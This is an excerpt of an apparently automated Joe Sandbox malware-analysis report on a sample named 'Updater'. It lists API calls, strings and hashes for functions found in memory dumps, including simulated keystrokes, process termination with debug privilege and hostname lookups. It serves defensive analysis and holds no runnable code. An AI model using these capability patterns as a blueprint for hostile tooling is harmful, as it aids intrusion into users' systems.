                                                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 337547030-0
                                                                                                  • Opcode ID: 70769bb9f9ef77e93e06c5e220a433f712043bbb7f8edf29decca5127095604e
                                                                                                  • Instruction ID: 8ab8c7328d4aa4c56b3c3660eec09af90128d81e91308b65d6d440ead0dd52c8
                                                                                                  • Opcode Fuzzy Hash: 70769bb9f9ef77e93e06c5e220a433f712043bbb7f8edf29decca5127095604e
                                                                                                  • Instruction Fuzzy Hash: 79315C71B02705EFDB629F65DC48A6ABBF8FF48300B14842DF85A86610D779E814EF60
                                                                                                  APIs
                                                                                                    • Part of subcall function 00733E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00733EB2
                                                                                                    • Part of subcall function 00733E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733EC3
                                                                                                    • Part of subcall function 00733E94: GetCurrentThreadId.KERNEL32 ref: 00733ECA
                                                                                                    • Part of subcall function 00733E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,0073368B), ref: 00733ED1
                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00733695
                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007336B3
                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007336B7
                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 007336C1
                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007336D9
                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 007336DD
                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 007336E7
                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007336FB
                                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 007336FF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$PostSleepThreadVirtual$AttachCurrentInputProcessSendTimeoutWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2686503918-0
                                                                                                  • Opcode ID: dfaccfc5429b1746d210d0fc2517930e8e9e2f4186bae307fc4cf9da274bbfde
                                                                                                  • Instruction ID: 43cdc2596643499dc1016fb8df8f9160cf4439690b1c51deec31db8f295f3b3f
                                                                                                  • Opcode Fuzzy Hash: dfaccfc5429b1746d210d0fc2517930e8e9e2f4186bae307fc4cf9da274bbfde
                                                                                                  • Instruction Fuzzy Hash: 4D01F131790314BBFB306B688C8EF597B5ADB4AB51F100001F319AE1E0C9EA2C40CA6D
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(00000000,014A8420,?,?,00000000,00000000), ref: 014A818B
                                                                                                    • Part of subcall function 014A6959: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 014A6977
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$InfoThread
                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                  • Opcode ID: 700eef214a6553c66d6bf0714acbb9bc5c50e5ed2689770aabfd777d1eb1407b
                                                                                                  • Instruction ID: 80b7abf81e8902434a6f34d4c27112248d3f3e62d2f410d637477184b0e49e39
                                                                                                  • Opcode Fuzzy Hash: 700eef214a6553c66d6bf0714acbb9bc5c50e5ed2689770aabfd777d1eb1407b
                                                                                                  • Instruction Fuzzy Hash: 6D614470B0414A9BDB10EFA6D890ADE77BAEBB8200FD7943FE141AB775DA34D9054710
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E2306: _wcslen.LIBCMT ref: 006E230B
                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0073D48A
                                                                                                  • _wcslen.LIBCMT ref: 0073D4D1
                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0073D538
                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0073D566
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                                                  • String ID: 0$p)z$)z
                                                                                                  • API String ID: 1227352736-291590143
                                                                                                  • Opcode ID: 00f86f300a4eddb65b4bab5f7bc0ac305f77bb2ffe8e6d36ee6d4b569618f970
                                                                                                  • Instruction ID: 105e0d3d6d2cf923f02396c3dcea5aba3c44b373b455cb0c29ae13b9dd1ef0a1
                                                                                                  • Opcode Fuzzy Hash: 00f86f300a4eddb65b4bab5f7bc0ac305f77bb2ffe8e6d36ee6d4b569618f970
                                                                                                  • Instruction Fuzzy Hash: F551F3B16043009BE7359F28E845B7B77E8AF86318F040A2DF995D3193EB78DD148B56
                                                                                                  APIs
                                                                                                    • Part of subcall function 0073E2AB: CreateToolhelp32Snapshot.KERNEL32 ref: 0073E2D0
                                                                                                    • Part of subcall function 0073E2AB: Process32FirstW.KERNEL32(00000000,?), ref: 0073E2DE
                                                                                                    • Part of subcall function 0073E2AB: CloseHandle.KERNEL32(00000000), ref: 0073E3BC
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075AB63
                                                                                                  • GetLastError.KERNEL32 ref: 0075AB76
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075ABA9
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0075AC5E
                                                                                                  • GetLastError.KERNEL32(00000000), ref: 0075AC69
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0075ACBA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                  • String ID: SeDebugPrivilege
                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                  • Opcode ID: 7427a23d5780f812dacb3361a4a86be4f67352252cf93e71ce095a1b650a14f4
                                                                                                  • Instruction ID: 7638d3f2537e935bfc9af58801ffe8f4fc3b2a005c8cd6efecacd885b106e296
                                                                                                  • Opcode Fuzzy Hash: 7427a23d5780f812dacb3361a4a86be4f67352252cf93e71ce095a1b650a14f4
                                                                                                  • Instruction Fuzzy Hash: D461BE70204242AFD720DF15C494F65BBE1AF44318F1585ACE8664BBA3C7B9ED49CB92
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007642BD
                                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007642D2
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007642EC
                                                                                                  • _wcslen.LIBCMT ref: 00764331
                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 0076435E
                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 0076438C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window_wcslen
                                                                                                  • String ID: SysListView32
                                                                                                  • API String ID: 2147712094-78025650
                                                                                                  • Opcode ID: 315596fe2aa59c08be0ba13ffe1407b60b60f076ba7c7ab6a56c3434d331bf9d
                                                                                                  • Instruction ID: 775473fae79da74f8181e9610fa11d9ef7733a758050a447385713b1c58f6000
                                                                                                  • Opcode Fuzzy Hash: 315596fe2aa59c08be0ba13ffe1407b60b60f076ba7c7ab6a56c3434d331bf9d
                                                                                                  • Instruction Fuzzy Hash: 9841C371A00318AFDF219F64CC49BEA7BA9FF48350F11412AFD19E7281D7799D908B90
                                                                                                  APIs
                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 014AA6F2
                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 014AA70E
                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 014AA747
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 014AA7D3
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 014AA7F2
                                                                                                  • VariantCopy.OLEAUT32(?), ref: 014AA827
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                  • String ID:
                                                                                                  • API String ID: 351091851-3916222277
                                                                                                  • Opcode ID: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
                                                                                                  • Instruction ID: b8db78e9bd56380010194cd908b5fa97bed4da4feae08fd5e339ef8c67bea76b
                                                                                                  • Opcode Fuzzy Hash: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
                                                                                                  • Instruction Fuzzy Hash: 0051FD7590022D9BDB62DB59C880BD9B7FCAF6C204F9141EAE619E7211D630AF85CF60
                                                                                                  APIs
                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0073CB80
                                                                                                  • IsMenu.USER32(00000000), ref: 0073CBA0
                                                                                                  • CreatePopupMenu.USER32 ref: 0073CBD6
                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 0073CC34
                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0073CC5C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                  • String ID: 0$2
                                                                                                  • API String ID: 93392585-3793063076
                                                                                                  • Opcode ID: b5302d9bfe602dd40d97e7b38c36271448d4a78f796d116cdb6c1e1195f79d77
                                                                                                  • Instruction ID: 6b520127f11d6f9d637f1f85abb0b7867628695976eae65ec90be6c806adc225
                                                                                                  • Opcode Fuzzy Hash: b5302d9bfe602dd40d97e7b38c36271448d4a78f796d116cdb6c1e1195f79d77
                                                                                                  • Instruction Fuzzy Hash: 4D51A070A00205DFEF22CF68D989BAEBBF4EF49314F145219E51AE7292D3789D40CB61
                                                                                                  APIs
                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 0073D6B1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: IconLoad
                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                  • API String ID: 2457776203-404129466
                                                                                                  • Opcode ID: 7d10ff9b0aa794a59b171cfe6674f9ce0ad1022f4d8f7fa9c3d879bb30d582a7
                                                                                                  • Instruction ID: 105e5456d231cba1d672f855bd33fe796befd3eff133d6e12b23cc3bd872a12b
                                                                                                  • Opcode Fuzzy Hash: 7d10ff9b0aa794a59b171cfe6674f9ce0ad1022f4d8f7fa9c3d879bb30d582a7
                                                                                                  • Instruction Fuzzy Hash: C811DB3271C70BFBF7255A59BC43D6F679CAF15394F20401EF92856182EBB86E5081AC
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                  • String ID: 0.0.0.0
                                                                                                  • API String ID: 642191829-3771769585
                                                                                                  • Opcode ID: 21185f0d8ade6b7c14185332246c8281efdb23dbf10c22221b2884fae4053558
                                                                                                  • Instruction ID: cebcaea096f5669704ebca4c41818422d55e2c1b4b02d09a7c036fd7d3d77009
                                                                                                  • Opcode Fuzzy Hash: 21185f0d8ade6b7c14185332246c8281efdb23dbf10c22221b2884fae4053558
                                                                                                  • Instruction Fuzzy Hash: 4E113A32A10218ABEB3077609C09EFE376CEF51310F000079F509970D2EEB99D418665
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,014A03D3,?,?,?,?,?,?,?,014A047F,0149F014), ref: 014A0342
                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,014A03D3,?,?,?,?,?,?,?,014A047F), ref: 014A0348
                                                                                                  • GetStdHandle.KERNEL32(000000F5,014A0391,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,014A03D3), ref: 014A035D
                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,014A0391,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,014A03D3), ref: 014A0363
                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 014A0381
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                  • Opcode ID: f3b785d70ae12f18e2f9a276c5acfbd1d18a3f711ecb20131d173a157f2a0f06
                                                                                                  • Instruction ID: 7b11b6ea047d2381ffd10fbf3b1195cc67c733bd711cba6a1097290559adeb85
                                                                                                  • Opcode Fuzzy Hash: f3b785d70ae12f18e2f9a276c5acfbd1d18a3f711ecb20131d173a157f2a0f06
                                                                                                  • Instruction Fuzzy Hash: C2F0BB50A843417BFF30A69A9CC6F9F2748D771B10F74410FB2985A4F5D7F045849362
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B
                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0076A98F
                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0076A9AF
                                                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0076ABF3
                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0076AC11
                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0076AC32
                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 0076AC51
                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0076AC76
                                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 0076AC99
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1211466189-0
                                                                                                  • Opcode ID: 8ad8399ac088fc15a16e2d3914b3617ec5b7009962b343a147a4211e4b45d951
                                                                                                  • Instruction ID: 62f297fb1b87a2d03d35d7df82dd8eadffe93a3c343f86a3d2bf901158bd293c
                                                                                                  • Opcode Fuzzy Hash: 8ad8399ac088fc15a16e2d3914b3617ec5b7009962b343a147a4211e4b45d951
                                                                                                  • Instruction Fuzzy Hash: C4B18771600219EFCF14CF68C9857AA7BB2FF44701F18C069ED4AAA295DB78A950CF61
                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(00000024,000000FF,00000000,?,?,00728E87,00000004,00000000,00000000), ref: 006E54CC
                                                                                                  • ShowWindow.USER32(00000024,00000006,00000000,?,?,00728E87,00000004,00000000,00000000), ref: 00728EE3
                                                                                                  • ShowWindow.USER32(00000024,000000FF,00000000,?,?,00728E87,00000004,00000000,00000000), ref: 00728F66
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1268545403-0
                                                                                                  • Opcode ID: 1f8b3c212ab60d91b64f823742c6964405cd4c1c8dc17f2a4b756978365d39cf
                                                                                                  • Instruction ID: 5ff33d6e7f994d604bb14d55b77b129e735533130908e873ceeaba78ed758d18
                                                                                                  • Opcode Fuzzy Hash: 1f8b3c212ab60d91b64f823742c6964405cd4c1c8dc17f2a4b756978365d39cf
                                                                                                  • Instruction Fuzzy Hash: BD412E30716BC0DACB75CB2ED94877A7BD3AB9131AF14840DE0474A6E1CA79A8C1C721
                                                                                                  APIs
                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 007114FE
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00711581
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00711614
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0071162B
                                                                                                    • Part of subcall function 0070282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007116A7
                                                                                                  • __freea.LIBCMT ref: 007116D2
                                                                                                  • __freea.LIBCMT ref: 007116DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 2829977744-0
                                                                                                  • Opcode ID: dfa1e8de3c5d906e1a7d01bce687cfa6c50c5c2fa18a85ff2cb8cddac6a9918b
                                                                                                  • Instruction ID: 5dc30947452a7d9f6b87228a64aa75f3cce087a0747c8e6bbebe503cbabf8277
                                                                                                  • Opcode Fuzzy Hash: dfa1e8de3c5d906e1a7d01bce687cfa6c50c5c2fa18a85ff2cb8cddac6a9918b
                                                                                                  • Instruction Fuzzy Hash: BF91B272E0025A9BDF208E6CC845AEE7BB59B49750F984659EE01EF1C1DB2DDC80CB60
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit
                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                  • API String ID: 2610073882-625585964
                                                                                                  • Opcode ID: e6aecedf6fe91ceb630711f874eded73a051fdd24cbd7c013abba32c84535ca5
                                                                                                  • Instruction ID: cf9a82a3456d9ff84c07b0cd5ff8218848922c30f2903236e62712c9e47628df
                                                                                                  • Opcode Fuzzy Hash: e6aecedf6fe91ceb630711f874eded73a051fdd24cbd7c013abba32c84535ca5
                                                                                                  • Instruction Fuzzy Hash: BF91B371A00619EBDF24CF94DC54FEEBBB8EF45315F108159F909AB240D7B89949CBA0
                                                                                                  APIs
                                                                                                  • VariantInit.OLEAUT32(?), ref: 007544FE
                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 0075460B
                                                                                                  • _wcslen.LIBCMT ref: 00754616
                                                                                                  • VariantClear.OLEAUT32(?), ref: 00754790
                                                                                                    • Part of subcall function 00741ABE: VariantInit.OLEAUT32(00000000), ref: 00741AFE
                                                                                                    • Part of subcall function 00741ABE: VariantCopy.OLEAUT32(?,?), ref: 00741B07
                                                                                                    • Part of subcall function 00741ABE: VariantClear.OLEAUT32(?), ref: 00741B13
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
